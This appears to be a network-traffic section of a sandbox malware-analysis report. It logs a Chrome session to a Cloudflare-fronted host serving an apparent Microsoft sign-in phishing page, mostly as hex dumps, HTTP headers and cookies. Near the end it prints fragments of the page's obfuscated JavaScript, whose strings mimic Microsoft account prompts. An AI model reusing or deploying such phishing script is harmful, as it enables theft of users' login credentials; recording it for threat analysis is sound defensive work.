                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 09 62 a1 75 bb d6 e5 71 dc d0 69 0b 53 c2 7f c5 70 a5 96 6a 2a 13 fa d0 66 41 85 b2 ae b2 ba fa d8 3f 87 5a ae 45 65 af 7e 7c e3 83 5c a9 d4 54 5a 8a 5f aa 1f 8a 3f 92 2f 61 d2 36 34 8b 1e 2b da 5d 8f c0 28 67 71 ac b6 64 85 15 5c 4b 97 e2 da 53 1c d4 8f 7a 81 69 c4 6c 5b f2 18 c0 c9 ed 95 03 8a 90 c3 88 31 3d 9b c5 f6 b9 49 10 0f f1 f9 f3 34 67 bd 3f f3 47 f2 33 13 26 d3 99 30 4c 26 e9 24 85 40 52 36 bb a5 e2 88 55 8c 15 6f 9d dd 3a ed 9a 53 a7 3d 0a d4 1c b3 db 62 55 0b a1 75 ca 5d 7a ac 57 38 5b 55 18 7c 37 fb 27 fe 25 e6 f2 75 2e 9c 88 31 31 8e 19 67 3c c6 ba 5e c7 a0 eb fa 4a c9 da 50 42 1b 4a 48 42 02 11 f0 6b fa b3 0f 0e 89 0a 91 8a 5d c4 80 28 24 a5 0d 44 ae 16 ab 53 22 75 be b7 ce 37 e2 fc ab 39 9f 38 15 a3 ee d4 9c 1a 55 a3 e6 37 13 d4 a6 ed 52
                                                                                                                          Data Ascii: buqiSpj*fA?ZEe~|\TZ_?/a64+](gqd\KSzil[1=I4g?G3&0L&$@R6Uo:S=bUu]zW8[U|7'%u.11g<^JPBJHBk]($DS"u798U7R
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 5a ec 2e ea 6f bc 2b 60 35 bf 35 5a 83 b4 de fb dc 86 73 36 72 d9 a6 1b 6d b6 41 b8 a1 37 41 18 59 1b 24 0b ff af f7 a8 ab 1d 5d 06 32 bc 00 f8 f2 2a fd 76 93 81 34 fd 8b 3f 9e 8d a6 5a c0 65 a8 f3 bf 9f f6 8a e5 7a 2d b7 76 66 8d cc 9e 17 b9 71 70 7c a4 bf 5f 72 bd 73 dd 99 e6 a5 b3 17 a5 29 b5 d0 4c 00 33 40 09 60 f2 22 97 8e 0c 63 96 10 1c 40 42 44 dd f4 16 cf 30 00 2b fb 79 0b 30 ab c4 72 0d 2d 40 8d fe 19 13 b5 2f 74 e2 3e 24 50 23 ab dc 2a 66 4d 64 c4 fc ff 2f 53 ab 6d 24 50 26 09 49 5d 09 75 9d 3e c1 ea 31 1f d2 98 cf 56 cd 54 a8 74 6a 7f 21 1b e3 9c 0f 44 44 22 1d 29 45 26 48 55 24 92 52 07 92 54 55 20 21 75 7d 24 c8 3a 01 40 86 24 32 00 8a cd 24 e5 2d 59 9e 72 a6 cc 4b 24 d5 13 80 aa 7a 82 60 1b 94 34 ce 2d 67 b1 1c ca 96 d5 9c 33 32 e3 a4 1a e3
                                                                                                                          Data Ascii: Z.o+`55Zs6rmA7AY$]2*v4?Zez-vfqp|_rs)L3@`"c@BD0+y0r-@/t>$P#*fMd/Sm$P&I]u>1VTtj!DD")E&HU$RTU !u}$:@$2$-YrK$z`4-g32
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 6a 7a 60 0c 13 89 88 62 3c 0e 61 b3 b9 df 8f 46 be bf 5e 13 41 92 56 2b c3 f8 7c 99 4c 34 9a cd 4e eb 24 e9 11 08 42 82 50 55 8a ca e7 09 22 9f a7 e9 02 b3 d7 4c 7f 80 16 b4 8e d1 da 94 bc cf 19 32 f7 ec cb 01 c7 91 d2 75 8d 69 51 fe a7 c3 d9 5d 60 c0 80 9d 77 4e a7 e7 9d 64 4c 38 e4 12 5b ea 9f 6f 23 16 48 90 de 8b 35 34 35 e1 43 b4 b6 e2 5b 28 0a 7e 3f b8 60 01 41 a5 a2 9d 5f aa aa 92 e7 97 9e 00 03 7a 83 f2 df f4 f1 96 7c fe b4 e4 ea d5 9a f9 6c b0 ba 4a 10 6f b7 59 2c ed 74 74 e4 f7 a7 d3 2b 96 40 40 51 66 f5 e7 a0 33 8f 73 f2 d6 c3 e5 9d c3 71 fc 46 72 66 3c 24 2e ce 60 06 3a c8 29 d6 a8 8f 62 ff a8 a5 b5 cd eb 44 76 4b 25 94 fc d0 62 76 e3 42 5d fd 97 64 4c 8b a5 52 6f f8 db 8f 00 94 fc c8 46 5c bd 1c c3 40 2b d1 7a 43 c4 ad 17 b2 b7 ee 9b 4d 09 0d
                                                                                                                          Data Ascii: jz`b<aF^AV+|L4N$BPU"L2uiQ]`wNdL8[o#H545C[(~?`A_z|lJoY,tt+@@Qf3sqFrf<$.`:)bDvK%bvB]dLRoF\@+zCM
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: fd c5 82 31 4f 15 e3 55 c5 6d 08 bd a7 f2 44 ba e3 32 32 28 17 53 0a ed 7f 7b c6 dc c7 36 a7 6b 52 2c 06 75 26 b3 e0 f1 37 9a 59 56 f6 22 67 3b 72 91 d4 8d dd ad a9 15 c7 f3 d0 c4 9b 6f 56 14 3e 27 1f 7b e3 cb 83 77 06 de c9 7f 06 8d 41 d0 6a 10 67 a2 75 ce 84 50 1f 7c d8 97 4e 77 b5 7a 46 0d 4f 75 67 aa 50 20 a3 13 2c 12 f3 54 e7 d6 9d 2d b4 a6 93 cf 99 1f a7 dd 6e 68 53 44 dd 65 65 89 d1 c0 a3 92 64 cc 31 18 63 26 13 31 4e cf 58 79 53 b2 2e db 9a 28 b6 9b 3c a6 00 5c 5e 11 8b 83 4b be 05 32 16 f2 27 f7 9c df b0 9c 1c 87 3a fa 62 03 4e 5f dc 30 32 d9 0e 2d 29 bb 39 86 5a ea 25 1c f9 80 80 d3 b0 59 47 03 e1 38 0e 99 e4 42 e4 67 ce e4 d4 da 88 c7 03 50 4c 29 22 8c 02 70 3a 8b 8a 3b 0f 04 48 26 b5 d1 e4 52 e7 01 3b 4a af d0 d3 a7 68 fe d1 72 c3 4a 60 ba 24
                                                                                                                          Data Ascii: 1OUmD22(S{6kR,u&7YV"g;roV>'{wAjguP|NwzFOugP ,T-nhSDeed1c&1NXyS.(<\^K2':bN_02-)9Z%YG8BgPL)"p:;H&R;JhrJ`$
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: f0 c0 86 e3 33 28 a4 0c 7f ce ad 6f 7d 7b b8 ec ad dd 69 7f 71 bf c9 b7 53 42 1e 17 77 8d c1 6e 71 3a 70 c3 b7 ba fc b4 f7 d5 23 12 d4 03 ac 4f 04 d3 fc 8d b7 e5 25 78 11 f2 94 38 ea 23 b3 13 be 8c de 5d 6b 96 6a 53 d4 f4 93 d0 14 d0 19 eb b8 2c 87 2a 04 4a 10 5f 78 bd eb bf 05 1c e9 f8 43 d9 ea af c6 23 62 41 f7 21 1d 7e 41 9f 82 2c b7 fc 55 50 9b 51 70 75 a8 cf 20 94 27 85 0a 16 c2 d5 50 55 97 db 1a cc e4 ea f8 bf 7f 82 9d cf b0 bf bf a8 d2 cf 05 72 5b e8 50 23 0f 23 4b 61 90 94 da f0 4d c9 51 9e 26 0a ec ec ab 69 b4 bd c3 2f 0a f0 74 03 f6 16 2e 59 39 12 0b bc 0c 0d 75 a9 8f 01 48 d7 04 85 96 d2 ab 02 9b de 6d db bd 90 bc 86 ef 83 5a 63 5b 32 e2 71 f8 6e c1 87 75 a9 ee 4c f7 99 27 02 3c 78 27 d8 98 de f7 56 7f 6e f1 fc aa 81 eb 24 c5 fb 60 e0 b0 f2 f0
                                                                                                                          Data Ascii: 3(o}{iqSBwnq:p#O%x8#]kjS,*J_xC#bA!~A,UPQpu 'PUr[P##KaMQ&i/t.Y9uHmZc[2qnuL'<x'Vn$`
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 5a bf 87 34 cd c0 3e 65 9e 2f 01 5a 66 15 4c 66 2a 54 35 47 19 d0 70 91 a6 15 9b 82 43 6d c1 ba 05 5c 5a 02 8e b2 3b 2d c1 a7 66 40 fb 6d 9e b9 36 6c a3 88 40 4e 4f 63 9f f6 bb e6 ac c5 81 43 73 09 90 52 6a 9b 3c 6f 5b 2d ac fe c4 56 3f 81 72 42 56 57 a6 ed 4e e8 0a 15 51 d4 8c fe ba 0c 61 bf 8a 56 84 96 60 fd 57 1d d4 64 13 9a 90 a7 8b 89 35 60 8b 3c b7 b7 76 cf d3 be da d0 82 50 1b dc 81 52 9f 2b 78 b5 85 1a db 2f 23 11 ee 7e 0f 9c d7 f5 b8 cb 06 d1 4f 79 55 8a 13 9b 6a a8 95 46 95 37 af 7b 7d 90 cb 24 1d 9e 26 31 5b 76 a7 8e 76 62 74 7b e0 dc a7 f1 6e 9f 45 d5 21 b2 23 85 2c cb e7 31 09 a3 7a 4c d0 45 20 b1 44 fe 05 66 c7 02 03 dc df d5 bb 25 f4 ec 02 f0 c1 23 0b fa 7f ae 9b 73 07 7b 16 f5 36 ec ec 00 db ec 7f d4 4b 78 3e 73 73 9f 0a ae ec e5 80 c4 cf
                                                                                                                          Data Ascii: Z4>e/ZfLf*T5GpCm\Z;-f@m6l@NOcCsRj<o[-V?rBVWNQaV`Wd5`<vPR+x/#~OyUjF7{}$&1[vvbt{nE!#,1zLE Df%#s{6Kx>ss
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 15 35 20 26 66 83 2f a9 1f 06 73 f8 04 37 8c 40 d8 77 41 da 72 95 b6 eb 8e b2 e1 41 b0 46 46 46 bf ac ac 61 22 51 3f 89 64 1d 59 47 5d ed 9d 30 84 b2 21 83 70 76 cc 01 9b 17 87 88 90 c0 6d c5 28 7e 7b 24 b1 db 2b 83 df 01 79 ec 6e 50 c4 ef 88 71 a8 64 75 dc 4e 6b 61 f7 2c d3 d8 3d d7 06 b0 97 d8 44 ab 65 07 b4 bb 45 c2 e3 55 62 10 69 58 16 18 ff 45 1e a2 6d 55 84 60 bb 94 83 f1 a5 aa 10 eb 80 6a 04 ba dd 16 24 bb cb 76 94 bb db 0e 54 fa b4 dd 28 f7 19 9d a8 f4 59 7b 91 ec f3 f6 a1 d0 17 ec 47 b1 2f ea 42 a1 2f 39 80 62 df 74 12 bc df 77 06 bc 3f 73 01 b9 7e ee 71 e4 fb bb 2d ec ef 7f d2 19 f5 41 7b 18 ef 31 87 58 ef 21 27 d1 79 d4 69 74 9e 74 8d 23 23 9b 2c 50 b6 a6 80 27 3b 52 c2 93 d9 40 c0 e7 aa a0 90 01 f3 29 68 ec d8 71 e2 04 83 80 00 e3 c2 05 82 1b
                                                                                                                          Data Ascii: 5 &f/s7@wArAFFFa"Q?dYG]0!pvm(~{$+ynPqduNka,=DeEUbiXEmU`j$vT(Y{G/B/9btw?s~q-A{1X!'yitt##,P';R@)hq
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: fb bb 45 1f b2 0d c5 5e fe 1c ed b9 cf 1d b1 cb ff c3 15 19 4b 45 99 72 f4 55 91 1e 19 a8 c4 54 55 2d b1 51 87 b3 90 16 ef e0 7c b5 01 7f 11 bf fd 9d cd c4 b3 07 50 b3 bc 50 30 a7 d7 9d 7f c5 ad aa e7 99 f7 23 f3 f4 fd f2 9f f3 60 81 f2 88 91 29 d4 b4 8f ff ff 93 18 65 f9 9f e8 a2 9f d1 80 d3 10 00 43 fc 33 0d 97 86 cc aa 3c 41 79 a5 b8 da 6d 00 aa 75 3c 04 9b 2b 02 72 61 45 50 0c 27 48 8a 66 58 8e 17 c4 72 ff 0a aa a6 1b a6 65 03 00 88 b0 24 13 ca b8 50 54 ad 3e b1 db 03 04 84 eb 88 80 62 38 41 52 34 c3 72 bc 20 96 b6 51 46 51 6b 9b a9 63 98 56 a3 e2 13 15 c2 04 21 e9 30 60 05 83 86 c4 8f e9 a0 a9 ff f0 17 a0 b7 17 e7 07 65 da fd 98 7e d8 04 c0 0d b5 75 78 ca 39 2a af 15 ac 6d 98 37 9c 46 60 a4 51 46 1b 63 ac 64 29 52 a5 49 97 21 53 56 45 1d 2a 36 25 95
                                                                                                                          Data Ascii: E^KErUTU-Q|PP0#`)eC3<Aymu<+raEP'HfXre$PT>b8AR4r QFQkcV!0`e~ux9*m7F`QFcd)RI!SVE*6%
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 1f 53 20 12 3a ff f4 e0 2a 3e 11 86 58 d0 a7 4b a4 9f 30 43 2a 57 1e f9 93 b6 18 71 90 82 a9 f1 87 99 45 9f 7c 1f 16 c8 19 c3 d1 38 d4 bd 9b 88 dd 02 1a a8 c3 84 0f 01 e8 45 a9 cb 78 33 78 77 42 42 8e 37 24 54 94 07 dc 6f 40 02 cd 02 7e a5 d5 9c 71 cd 4d 9d 2f bd 5f f8 9e be 63 00 40 a8 85 c6 44 18 30 f6 c0 da 0b 27 5c 84 48 51 a2 c5 d8 27 43 26 02 22 92 13 20 64 14 59 b2 e5 a0 3a 99 67 82 e6 ee 72 cf 1d 66 c7 a3 2c 1a da 79 0f 13 14 29 92 e2 71 c9 44 e4 e7 84 a0 c2 9f f7 0e ba a8 11 61 68 5f fa 1d ff f6 b8 d7 09 45 9d f7 18 61 a2 cf d1 a7 76 8f 13 7e b0 51 c5 d3 5b 09 40 57 2c 6f 6b b6 61 22 ea 37 fd 68 16 80 a1 c0 35 c2 0c d2 3a 85 ef 21 50 78 14 9f 15 27 6e bd a6 4d 6a 70 82 bc 56 5c ed c3 07 4f fc db 7e b8 f3 ce 26 a0 dc bc 05 0a 43 71 81 c0 11 41 31
                                                                                                                          Data Ascii: S :*>XK0C*WqE|8Ex3xwBB7$To@~qM/_c@D0'\HQ'C&" dY:grf,y)qDah_Eav~Q[@W,oka"7h5:!Px'nMjpV\O~&CqA1


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.2.449786104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:50 UTC1275OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: Upgrade
                                                                                                                          Pragma: no-cache
                                                                                                                          Cache-Control: no-cache
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Upgrade: websocket
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          Sec-WebSocket-Key: kqkZncZX0mBMIcU1CMdOgg==
                                                                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                          2024-04-17 00:34:51 UTC579INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:51 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CXZ5HnZ4g2MqxcvfYKbVP3QQsPhKnztq2WsitveDXtEN%2FLscwKl2n3%2BpyAygqnV1uo5J16%2FIj4Szn4W%2FlH3t0%2FoWnBvDC3SkVlQrzxuTAL4AL9%2BQWfMZYnV3nV1wvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854e938196740-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:51 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                          Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                          2024-04-17 00:34:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.449788104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:50 UTC1397OUTGET /34s6xy28ZSROS4cpdHadCJue12ijCcyRgKMuW0KrD89102 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:51 UTC777INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:51 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="34s6xy28ZSROS4cpdHadCJue12ijCcyRgKMuW0KrD89102"
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RgScagtt9RTKuXvY4wqOuPQPR3apbWf8Jjktg0IHsCYLIYHdjfflQDNPWbmbE7DBH4u0pDTTL58LGB4wrq5LJH8yYKoGTVx06BVVDSi3q%2Fl%2FDObcHIamYeiwI4qrxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854eabc1553f0-ATL
                                                                                                                          2024-04-17 00:34:51 UTC592INData Raw: 37 63 38 38 0d 0a 63 6f 6e 73 74 20 5f 30 78 33 63 30 62 36 39 3d 5f 30 78 34 30 62 64 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 66 61 33 65 2c 5f 30 78 37 34 33 61 34 66 29 7b 63 6f 6e 73 74 20 5f 30 78 31 66 33 38 61 38 3d 5f 30 78 34 30 62 64 2c 5f 30 78 32 64 38 38 62 36 3d 5f 30 78 31 66 66 61 33 65 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 36 31 39 34 34 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 66 33 38 61 38 28 30 78 32 30 62 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 66 33 38 61 38 28 30 78 33 31 39 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 66 33 38 61 38 28 30 78 32 64 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 66 33 38 61 38 28 30
                                                                                                                          Data Ascii: 7c88const _0x3c0b69=_0x40bd;(function(_0x1ffa3e,_0x743a4f){const _0x1f38a8=_0x40bd,_0x2d88b6=_0x1ffa3e();while(!![]){try{const _0x461944=-parseInt(_0x1f38a8(0x20b))/0x1+parseInt(_0x1f38a8(0x319))/0x2*(parseInt(_0x1f38a8(0x2d0))/0x3)+parseInt(_0x1f38a8(0
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 7d 7d 7d 28 5f 30 78 34 36 32 34 2c 30 78 61 31 33 35 63 29 29 3b 76 61 72 20 77 65 62 6e 6f 74 66 6f 75 6e 64 3d 21 5b 5d 2c 6f 74 68 65 72 77 65 62 75 72 6c 3d 27 27 2c 69 6e 74 65 72 61 63 74 65 64 3d 30 78 30 2c 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 62 61 63 6b 3d 30 78 30 3b 21 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 63 30 62 36 39 28 30 78 32 66 66 29 5d 28 5f 30 78 33 63 30 62 36 39 28 30 78 33 33 32 29 29 5b 5f 30 78 33 63 30 62 36 39 28 30 78 32 64 66 29 5d 5b 5f 30 78 33 63 30 62 36 39 28 30 78 32 65 31 29 5d 28 5f 30 78 33 63 30 62 36 39 28 30 78 31 65 37 29 29 26 26 28 76 69 65 77 3d 5f 30 78 33 63 30 62 36 39 28 30 78 32 63 38 29 29 3b 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 33 63 30
                                                                                                                          Data Ascii: }}}(_0x4624,0xa135c));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x332))[_0x3c0b69(0x2df)][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view=_0x3c0b69(0x2c8));document['getElementById'](_0x3c0
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 76 69 65 77 29 5b 5f 30 78 32 62 65 33 36 39 28 30 78 32 39 32 29 5d 28 5f 30 78 32 62 65 33 36 39 28 30 78 32 39 31 29 29 21 3d 3d 6e 75 6c 6c 26 26 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 32 62 65 33 36 39 28 30 78 31 66 37 29 2b 76 69 65 77 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d 28 5f 30 78 32 62 65 33 36 39 28 30 78 32 39 31 29 29 5b 5f 30 78 32 62 65 33 36 39 28 30 78 33 30 31 29 5d 28 29 3b 7d 7d 7d 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 69 6e 67 61 6e 69 6d 61 74 69 6f 6e 28 5f 30 78 31 63 62 61 63 63 29 7b 63 6f 6e 73 74 20 5f 30 78 31 66 30 32 32 39 3d 5f 30 78 33 63 30 62 36 39 3b 5f 30 78 31 63 62 61 63 63 3d 3d 30 78 30 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31
                                                                                                                          Data Ascii: view)[_0x2be369(0x292)](_0x2be369(0x291))!==null&&document['getElementById'](_0x2be369(0x1f7)+view)['querySelector'](_0x2be369(0x291))[_0x2be369(0x301)]();}}}}});function loadinganimation(_0x1cbacc){const _0x1f0229=_0x3c0b69;_0x1cbacc==0x0&&(document[_0x1
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 73 74 5c 78 32 30 63 61 6c 6c 69 6e 67 27 2c 27 73 63 72 69 70 74 27 2c 27 63 68 65 63 6b 65 64 27 2c 27 76 61 6c 75 65 27 2c 27 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 73 27 2c 27 53 69 67 6e 5c 78 32 30 6f 75 74 5c 78 32 30 61 6e 64 5c 78 32 30 73 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 77 69 74 68 5c 78 32 30 61 5c 78 32 30 64 69 66 66 65 72 65 6e 74 5c 78 32 30 61 63 63 6f 75 6e 74 27 2c 27 61 6c 74 27 2c 27 5c 78 32 30 3c 61 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 23 5c 78 32 32 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32 32 27 2c 27 73 65 63 74 69 6f 6e 73 5f 27 2c 27 64 65 73 63 27 2c 27 63 6c 69 63 6b 65 64 27 2c 27 69 41 64 64 69 74 69 6f 6e 61 6c 50 72 6f 6f 66 49 6e 66 6f 27 2c 27 75 72 6c 28 5c 78 32 37 27 2c 27 53 65 6e 64 5c 78 32 30 61
                                                                                                                          Data Ascii: st\x20calling','script','checked','value','multipleaccounts','Sign\x20out\x20and\x20sign\x20in\x20with\x20a\x20different\x20account','alt','\x20<a\x20href=\x22#\x22\x20data-id=\x22','sections_','desc','clicked','iAdditionalProofInfo','url(\x27','Send\x20a
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 61 69 6c 27 2c 27 63 61 6e 74 41 63 63 65 73 73 41 63 63 6f 75 6e 74 27 2c 27 43 61 6e e2 80 99 74 5c 78 32 30 61 63 63 65 73 73 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 63 63 6f 75 6e 74 3f 27 2c 27 73 65 6c 65 63 74 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 61 64 66 73 28 74 68 69 73 29 27 2c 27 57 65 5c 78 32 30 63 6f 75 6c 64 6e 5c 78 32 37 74 5c 78 32 30 66 69 6e 64 5c 78 32 30 61 6e 5c 78 32 30 61 63 63 6f 75 6e 74 5c 78 32 30 77 69 74 68 5c 78 32 30 74 68 61 74 5c 78 32 30 75 73 65 72 6e 61 6d 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 6e 6f 74 68 65 72 2c 5c 78 32 30 6f 72 5c 78 32 30 67 65 74 5c 78 32 30 61 5c 78 32 30 6e 65 77 5c 78 32 30 4d 69 63 72 6f 73 6f 66 74 5c 78 32 30 61 63 63 6f 75 6e 74 2e 27 2c 27 72 65 64 69 72 65 63 74 65 64 5c 78
                                                                                                                          Data Ascii: ail','cantAccessAccount','Cant\x20access\x20your\x20account?','selectmultipleaccountadfs(this)','We\x20couldn\x27t\x20find\x20an\x20account\x20with\x20that\x20username.\x20Try\x20another,\x20or\x20get\x20a\x20new\x20Microsoft\x20account.','redirected\x
